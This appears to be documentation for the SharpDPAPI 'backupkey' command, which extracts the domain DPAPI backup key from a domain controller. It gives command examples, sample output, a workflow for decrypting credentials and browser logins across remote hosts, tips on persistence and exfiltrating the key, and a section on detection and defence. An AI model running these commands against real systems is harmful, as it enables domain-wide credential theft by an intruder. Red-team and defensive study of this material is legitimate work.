Skip to main content

Overview

The backupkey command retrieves the domain DPAPI backup key from a domain controller using the LsaRetrievePrivateData API. This private key can decrypt masterkeys for any domain user and never changes.
This command requires Domain Admin (or equivalent) privileges to retrieve the backup key from the domain controller.

Basic Usage

# Retrieve from current domain controller
SharpDPAPI.exe backupkey

# Specify domain controller
SharpDPAPI.exe backupkey /server:dc.domain.com

# Save to file
SharpDPAPI.exe backupkey /file:key.pvk

# Prevent base64 wrapping
SharpDPAPI.exe backupkey /nowrap

Command Arguments

ArgumentDescription
/server:SERVER.domain.comSpecify domain controller (auto-detected if not provided)
/file:key.pvkSave backup key to file instead of displaying
/nowrapPrevent wrapping base64 output (display in single line)

Why The Backup Key Is Powerful

Never Changes

The domain backup key is generated once and never rotates

Domain-Wide

Works for ALL domain users across the entire domain

Decrypt Anything

Can decrypt any user’s DPAPI protected data

Persistent Access

Maintains access even after password changes

Example: Retrieve Backup Key

SharpDPAPI.exe backupkey
Output: 
[*] Action: Retrieve domain DPAPI backup key

[*] Using current domain controller  : PRIMARY.testlab.local
[*] Preferred backupkey Guid         : 32d021e7-ab1c-4877-af06-80473ca3e4d8
[*] Full preferred backupKeyName     : G$BCKUPKEY_32d021e7-ab1c-4877-af06-80473ca3e4d8
[*] Key :
      HvG1sAAAAAABAAAAAAAAAAAAAACUBAAABwIAAACkAABSU0EyAAgAAA
      EAAQADYjk2xX6BGbvXhUKJwq0M9BqvzaKLLLfSU... (truncated)

Example: Save to File

SharpDPAPI.exe backupkey /server:primary.testlab.local /file:key.pvk
Output: 
[*] Action: Retrieve domain DPAPI backup key

[*] Using server                     : primary.testlab.local
[*] Preferred backupkey Guid         : 32d021e7-ab1c-4877-af06-80473ca3e4d8
[*] Full preferred backupKeyName     : G$BCKUPKEY_32d021e7-ab1c-4877-af06-80473ca3e4d8
[*] Backup key written to            : key.pvk
Save the backup key to a file for reuse. You won’t need to retrieve it again.

Using The Retrieved Backup Key

Once you have the backup key, use it with other SharpDPAPI commands:
  • Base64 Key
  • Key File
  • Remote Systems
  • SharpChrome
# Use inline base64 key
SharpDPAPI.exe triage /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...
SharpDPAPI.exe masterkeys /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...
SharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...

Typical Workflow

1

Obtain Domain Admin

Compromise an account with Domain Admin or equivalent privileges
2

Retrieve Backup Key

SharpDPAPI.exe backupkey /file:backup.pvk
3

Triage Local System

SharpDPAPI.exe triage /pvk:backup.pvk
SharpChrome.exe logins /pvk:backup.pvk
4

Triage Remote Systems

# File servers, workstations, etc.
SharpDPAPI.exe triage /pvk:backup.pvk /server:fileserver.domain.com
SharpDPAPI.exe triage /pvk:backup.pvk /server:workstation.domain.com
5

Maintain Access

Keep the backup key secure - it provides persistent domain-wide DPAPI decryption capability

Technical Details

Storage Location

The backup key is stored in Active Directory as an LSA secret: 
G$BCKUPKEY_{GUID}

Retrieval Method

SharpDPAPI uses the LsaRetrievePrivateData API, the same method used by Mimikatz:
  • Connects to domain controller
  • Authenticates with current credentials
  • Retrieves the preferred backup key GUID
  • Extracts the RSA private key

Key Properties

  • Algorithm: RSA (typically 2048-bit)
  • Format: Microsoft PRIVATEKEYBLOB structure
  • Persistence: Never rotates unless manually regenerated
  • Scope: All domain users

Converting Key Formats

The backup key can be used in different formats:
  • For SharpDPAPI
  • For Mimikatz
# Use directly as base64 or .pvk file
SharpDPAPI.exe triage /pvk:key.pvk

Detection Considerations

Retrieving the domain backup key is a high-value operation that should be detected and alerted.

Network Detection

  • MS-BKRP Protocol: Backup Key Remote Protocol usage
  • RPC Calls: LsaRetrievePrivateData calls to domain controller
  • Event ID 4662: Access to sensitive AD objects

Host-Based Detection

  • Process Execution: SharpDPAPI.exe or similar tools
  • API Calls: LsaRetrievePrivateData invocations
  • Privilege Usage: SeBackupPrivilege or equivalent

Event Log Indicators

Monitor domain controllers for: 
Event ID: 4662
Object Type: Secret Object
Access Mask: Read Property
Object Name: G$BCKUPKEY_*

Defensive Measures

  • Monitor for Event ID 4662 with object name containing “BCKUPKEY”
  • Alert on MS-BKRP protocol usage
  • Track LsaRetrievePrivateData API calls
  • Monitor for privileged account access to sensitive LSA secrets
  • Strictly control Domain Admin privileges
  • Implement tiered administration model
  • Use Protected Users group for high-value accounts
  • Enable advanced audit policies for object access
  • Consider rotating backup key periodically (requires planning)

masterkeys

Decrypt user masterkeys with backup key

triage

Comprehensive user DPAPI triage

credentials

Decrypt credentials with backup key

machinetriage

Triage machine DPAPI data

Tips

  • Retrieve the backup key once and reuse it
  • Store securely - it’s valid indefinitely
  • Use /file to avoid base64 in command history
  • Consider exfiltrating key over encrypted channel
  • Clean up temporary files after use
Access Denied:
  • Verify you have Domain Admin privileges
  • Check network connectivity to domain controller
  • Ensure domain controller is reachable
No backup key found:
  • Domain must have DPAPI enabled (default in AD)
  • Verify the domain controller is functioning properly
  • Try specifying DC explicitly with /server

Mimikatz Equivalent

# Mimikatz command
mimikatz# lsadump::backupkeys /system:dc.domain.com /export

# SharpDPAPI equivalent
SharpDPAPI.exe backupkey /server:dc.domain.com /file:key.pvk
Both retrieve the same backup key, just in different formats.